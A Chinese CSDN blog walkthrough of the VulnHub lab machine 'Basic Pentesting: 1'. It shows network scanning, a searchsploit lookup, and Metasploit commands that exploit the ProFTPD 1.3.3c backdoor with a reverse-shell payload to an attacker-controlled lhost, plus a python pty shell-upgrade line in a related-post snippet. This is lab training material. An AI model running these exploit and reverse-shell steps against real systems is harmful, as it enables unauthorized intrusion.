basic_pentesting_1靶机

已于 2024-08-08 10:05:45 修改
阅读量331 收藏 4
点赞数 11
文章标签: 服务器 网络 github 开源 学习方法
于 2024-08-08 09:20:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61995767/article/details/141017515
版权

靶机地址:Basic Pentesting: 1 ~ VulnHub

查看靶机的MAC地址:

一、信息收集

扫描目标主机

arp-scan -l

使用nmap扫描开放的端口,同时知道了服务及版本ProFTPD 1.3.3c

nmap -sV -p- 192.168.7.233

二、Getshell

使用以下命令,搜索对应的服务版本信息,看是否有利用脚本,发现利用脚本

searchsploit ProFTPD 1.3.3c

查看搜索到的利用信息,发现在msf中已经可以直接利用

cp /usr/share/exploitdb/exploits/linux/remote/16921.rb .

使用msf搜索其历史漏洞

msfconsole
search ProFTPD 1.3.3c
use 0
show options
set rhost 192.168.7.233           #设置远程目标ip地址
set payload cmd/unix/reverse      #设置利用载荷
set lhost 192.168.7.251
run

嗷嗷~嗷嗷~
关注
  • 11
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机渗透测试:basic_pentesting_1靶机提权
x_13579的博客
04-13 792
靶场提权
basic_pentesting_1靶机渗透
weixin_64809022的博客
06-23 761
Python提权: python3 -c 'import pty;pty.spawn("/bin/bash")'
basic_pentesting1靶机
qq_68865419的博客
10-19 253
这次我们使用一种新方法查看靶机的ipNetdiscover:二层发现工具,拥有主动和被动发现两种方式。首先查看靶机的ip​​​​​​然后查看本机的ip,使用ipconfig然后扫描靶机ip。
Vulnhub靶机basic_pentesting_1
qq_48904485的博客
02-29 452
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机basic_pentesting_1(10.0.2.6)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/
BasicPentesting:从TryHackMe清除基本渗透测试室
02-12
基本的沉思 IP: 10.10.251.73 斯坎尼格 开放端口 22 80 139 445 8009 8080 问题与解答 Web服务器上的隐藏目录( development ,可通过GoBuster找到) 用户名(通过enum4linux找到... 在ssh服务器中,使用与John一起
信息安全_数据安全_Pentesting ICS 102.pdf
08-22
信息安全_数据安全_Pentesting ICS 102 信息保护 网络安全 web安全 网络安全 安全设计
java红酒网站源码-pentesting_Notes:pentesting_Notes
06-05
java网站源码Pentesting Pratic Notes(备忘单) 文件检测和提取器: file targetFile strings targetFile | grep flag strings -o targetFile strings -a targetFile strings -t d targetFile strings -f ...
Pentesting
03-21
渗透测试
营收同比大增215%,联想x86服务器夯实市场前三
云科技时代
09-12 450
稳扎稳打,炼就产品硬实力!
Linux - iptables防火墙
最新发布
2401_85983616的博客
09-12 529
iptables防火墙是Linux系统防火墙的一种,实际上由两个组件netfilter和iptables组成。netfilters与iptables的关系:netfilter:属于“内核态”的防火墙功能体系。是内核的一部分,由一些数据包过滤表组成,这些表包含内核用来控制数据包过滤处理的规则集。iptables:属于“用户态”的防火墙管理体系。是一种用来管理Linux防火墙的命令程序,它使插入、修改和删除数据包过滤表中的规则变得容易,通常位于/sbin/iptables文件下。
chattr:修改文件的特殊属性
qq_38641599的博客
09-12 348
​chattr​命令用于改变文件的特殊属性,也称为"chattr 属性"。这些属性可以提供额外的安全性和控制,如设置文件为不可修改、只允许在文件末尾添加数据等。‍。
如何进行IP清洗
KookeeyLena3的博客
09-12 180
在数据抓取、网络爬虫或网络营销等活动中,IP地址的清洗是一个至关重要的环节。IP清洗旨在移除无效、受污染或可能引发问题的IP地址,从而提高网络活动的效率和安全性。本文将详细介绍如何进行IP清洗,包括识别问题IP、选择清洗工具、执行清洗过程以及后续的监控与维护。
Linux df命令详解,Linux查看磁盘使用情况
wangyuxiang946的博客
09-06 1329
字段解释、显示单位、汇总显示、指定目录、指定显示字段、du和df结果不一样
通过TensorBoard查看服务器训练过程
记录图像处理中遇到的点点滴滴
09-12 139
在本地查看服务器训练代码过程
运维的基本概念:服务器网络基础知识
Echo_Wish的博客
09-12 610
服务器网络是现代IT系统的基础设施,运维工程师需要掌握这些基础知识,才能有效地管理和维护系统。希望本文能够帮助读者更好地理解运维的基本概念,并提供一些实用的服务器网络管理示例。通过不断学习和实践,运维工程师可以提升自己的技能,为企业的IT系统保驾护航。
Python发邮箱:如何配置SMTP服务器发邮件?
danplus的博客
09-09 560
随着Python和SMTP技术的不断发展,Python发邮箱的功能和安全性将进一步提升,为我们的工作和生活带来更多便利。AokSend,Python发邮箱新选择,API与SMTP接口强强联合,让邮件发送更快速、更安全!
Exchange 服务器存档配额配置方法及注意事项
xueyunshengling的博客
09-09 1309
Exchange 存档(或称为Online Archive)是专为帮助用户管理大量电子邮件而设计的。它是一个独立于主邮箱的存档邮箱,可以存储长期保存的邮件。存档邮箱可以大大减少主邮箱的负担,同时提供便捷的访问存档邮件的方式。配置Exchange存档配额是企业管理邮件存储的一个重要环节。通过合理配置存档配额,可以有效地控制存储资源的使用,提高系统性能,满足合规性要求。在配置过程中,既可以通过Exchange管理中心进行图形化配置,也可以使用PowerShell脚本进行批量和高级配置。
恒创科技:最小化服务器存储容量的技巧
SonderCloud_的博客
09-06 544
根据服务器的操作系统,您可以选择不同的文件系统来满足您的存储需求。例如,您可以使用云存储服务备份服务器的数据、存档旧数据或不常用的数据,或在多个设备之间同步数据。您可以使用磁盘使用情况分析器或 TreeSize 等工具扫描服务器的磁盘和文件夹,并确定最大的文件、目录和分区。您还可以随时监控服务器的存储使用情况,并为未来的增长和可扩展性做好规划。您可以用更新或更大的磁盘替换旧的或有故障的磁盘,或者从硬盘驱动器 (HDD) 升级到固态驱动器 (SSD)。您应该根据服务器的存储需求和预算权衡更新存储硬件的利弊。
构建高级渗透测试虚拟实验室:实践与专业技巧
《构建高级渗透测试虚拟实验室》(Building Virtual Pentesting Labs for Advanced Penetration Testing, PACKT, 2014)是一本专注于指导读者如何构建自己的虚拟渗透测试实验室的专业教材。在当前网络安全形势日益严峻...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值